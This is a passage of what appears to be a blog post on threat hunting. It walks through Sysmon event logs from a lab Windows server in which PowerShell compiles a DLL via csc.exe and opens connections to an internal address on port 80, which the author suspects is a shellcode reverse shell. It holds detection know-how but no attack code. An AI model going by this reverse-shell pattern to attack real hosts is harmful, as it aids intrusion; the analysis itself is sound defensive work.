"c:\Users\davehull\AppData\Local\Temp\3m35xm2u\CSC81A6F4C3835645A8965DB621A6C573D8.TMP"</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=70D838A7DC5B359C3F938A71FAD77DB0,SHA256=E4DBDBF7888EA96F3F8AA5C4C7F2BCF6E57D724DD8194FE5F35B673C6EF724EA,IMPHASH=0FCE7AAB563778C495FB59AA62464473</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 44</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.cmdline"</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And here's the output, a dll created in the Temp directory:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:37 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>11</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: File created (rule: FileCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">File created:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: DLL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:37.458</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 44</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetFilename: C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CreationUtcTime: 2020-07-19 20:03:37.161</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Next up, Sysmon shows:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:39 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>3</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Network connection detected (rule: NetworkConnect)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Network connection detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:34.735</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Protocol: tcp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Initiated: true</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIp: 10.47.47.17</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceHostname: wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePort: 53245</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePortName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationIp: 10.47.47.26</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationHostname: -</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationPort: 80</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationPortName: http</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Perhaps our shellcode set up this reverse shell connecting to 10.47.47.26 via port 80?</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And another, but the source port has incremented:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:39 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>3</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Network connection detected (rule: NetworkConnect)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Network connection detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">UtcTime: 2020-07-19 20:03:35.259</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">ProcessId: 2752</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Image: C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User: 1011LABS\dave.hull</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Protocol: tcp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Initiated: true</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIp: 10.47.47.17</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceHostname: wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourcePort: 53246</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePortName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: 